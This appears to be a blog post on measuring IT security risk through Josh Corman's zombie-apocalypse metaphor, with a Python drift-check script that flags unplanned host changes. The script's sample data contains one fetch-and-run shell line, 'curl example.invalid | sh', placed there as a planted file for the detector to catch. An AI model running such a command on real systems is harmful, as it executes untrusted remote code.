One of the most vexing problems that faces IT organizations these days is how to measure their relative risk of being hacked or otherwise attacked. This sounds like pretty dry stuff, but it’s not. Failing to adequately account for your risks and exposure can mean the difference between swatting away an annoying intrusion attempt, and watching as foreign competitors or nation-states siphon off your critical intellectual property, bleeding your company of its competitiveness.
But raising the alarm about this is always a tricky matter. Soft-pedal it, and nobody takes you seriously. Scream from the rafters and …well…you’re screaming from the rafters. My friend and former colleague Josh Corman, however, found a good metaphor for the whole affair: the ZOMBIE APOCALYPSE. It’s all a bit of fun – though Mr. Corman is dead serious about the zombie stuff. Still, the idea is simple: attacks on your network and those of your partners are zombie-like in that they’re unrelenting and (often) mindless and opportunistic. And there are many more of them than there are of you. So, as in the ZOMBIE APOCALYPSE, you’re only as good as your defenses. Those defenses need to be strong and, also, appropriate to the task at hand.
In the latest segment from Talking Code, sponsored by Veracode, Corman says that is where most companies fall down. Corman has been a vocal critic of the Payment Card Industry Data Security Standard (PCI DSS). “We’re not literate enough to secure things. We think ‘Oh, I’ll put an IDS in front of it, or we’ll put some signature antivirus on the box.’ That was my criticism of the PCI list: that what PCI has chosen for the 11 required controls are very brittle security countermeasures.”
Putting your faith in antivirus to protect you from adverse events is akin to boarding up your windows with balsa wood, Corman says.
“Do you run to the dilapidated wooden barn or the brick building when chased by zombies? You want to go to the defensible infrastructure,” he said.
But defensible infrastructure is just part of the fix. Organizations also need to improve their operations. “You need to know what’s in your environment and when it changes. There should be no unplanned changes,” said Corman, who notes the work that Gene Kim has done with the (still nascent) “DevOps” movement. Sturdy and repeatable processes will cut down on the chaos and anxiety – and that’s key to making sure that “your fellow survivors in the apocalypse keep their wits about them,” Corman says. After that comes situational awareness and instrumentation: understanding to the best of your ability what is happening in your environment and when. Only at the end do specific countermeasures come into play – what Corman calls the “empty calories” at the top of the IT risk pyramid.
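To make “know what’s in your environment and when it changes” concrete, here is a small drift check, added as an illustration of the idea rather than anything from Corman, Veracode or the Talking Code segment. It hashes a baseline inventory of a host, compares it with a later snapshot, and reports every change that is not backed by an approved change record. The file contents, paths and ticket number below are constructed sample data; on a real host the baseline would come from configuration management and the snapshot from an agent or a file-integrity monitor.

```python
from __future__ import annotations

import hashlib

# Constructed sample data: what the host looked like when it was last
# reconciled with configuration management (the baseline), what it looks
# like now (the current snapshot), and the changes operations actually
# approved. The paths, contents and ticket number are illustrative.
BASELINE_FILES = {
    "/etc/ssh/sshd_config": b"PermitRootLogin no\n",
    "/usr/sbin/nginx": b"nginx-1.24",
    "/etc/cron.d/backup": b"0 2 * * * root /usr/local/bin/backup\n",
}
CURRENT_FILES = {
    "/etc/ssh/sshd_config": b"PermitRootLogin yes\n",   # nobody asked for this
    "/usr/sbin/nginx": b"nginx-1.26",                     # planned upgrade
    "/etc/cron.d/backup": b"0 2 * * * root /usr/local/bin/backup\n",
    "/tmp/.x/kit.sh": b"#!/bin/sh\ncurl example.invalid | sh\n",  # nobody asked for this either
}
APPROVED_CHANGES = [
    {"path": "/usr/sbin/nginx", "kind": "modified", "ticket": "CHG-1042"},
]


def snapshot(files: dict[str, bytes]) -> dict[str, str]:
    """Reduce an inventory to path -> SHA-256 of content, so two snapshots
    can be compared without keeping the file contents around."""
    return {path: hashlib.sha256(content).hexdigest() for path, content in files.items()}


def diff_inventory(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Classify every path as added, removed or modified between two snapshots."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys() if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def unplanned_changes(diff: dict[str, list[str]], approved: list[dict]) -> list[tuple[str, str]]:
    """Return (kind, path) for each change that has no approved change record.
    A change record covers exactly one path and one kind of change."""
    covered = {(c["path"], c["kind"]) for c in approved}
    return sorted(
        (kind, path)
        for kind, paths in diff.items()
        for path in paths
        if (path, kind) not in covered
    )


def report() -> list[tuple[str, str]]:
    """Run the drift check over the constructed sample data."""
    diff = diff_inventory(snapshot(BASELINE_FILES), snapshot(CURRENT_FILES))
    return unplanned_changes(diff, APPROVED_CHANGES)


if __name__ == "__main__":
    for kind, path in report():
        print(f"UNPLANNED {kind:<9} {path}")
```

The nginx upgrade is reconciled against its change ticket and disappears from the output; the loosened sshd setting and the new file under /tmp are not, and those are exactly the two things a survivor wants to hear about. The check is deliberately dumb: it does not try to decide whether a change is malicious, only whether it was planned, which is the question Corman is asking.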
Check out the video here.